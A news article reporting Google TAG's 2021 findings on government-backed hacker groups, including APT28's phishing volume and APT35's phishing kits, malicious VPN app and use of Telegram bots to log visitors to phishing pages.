The Google Threat Analysis Group (TAG) said that it is tracking more than 270 government-backed hacker groups from over 50 countries, involved in disinformation campaigns, cyber-espionage, or financially motivated cybercrime.
In a new blog post TAG’s Ajax Bash revealed that so far in 2021 the team sent over 50,000 warnings of state-sponsored phishing or malware attempts to customers. This marks a 33% increase from the same period in 2020, largely due to blocking “an unusually large campaign” from a Russia-linked threat actor known as APT28 or Fancy Bear.
One of the most notable campaigns disrupted by TAG this year was orchestrated by Iranian threat actor APT35 (aka Charming Kitten, Phosphorous, or Newscaster), known for its phishing attacks targeting high risk users.
Some previous attacks of the group involved the use of compromised websites to host a phishing kit that allowed them to collect credentials for platforms such as Gmail, Hotmail, and Yahoo, as well as a malicious VPN app uploaded to the Google Play Store that, when installed, could be leveraged to steal sensitive information such as call logs, text messages, contacts, and location data from the infected devices.
The group also adopted a novel technique that uses Telegram for operator notifications.
“The attackers embed javascript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram and they have taken action to remove it,” TAG explained.
“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Bash said.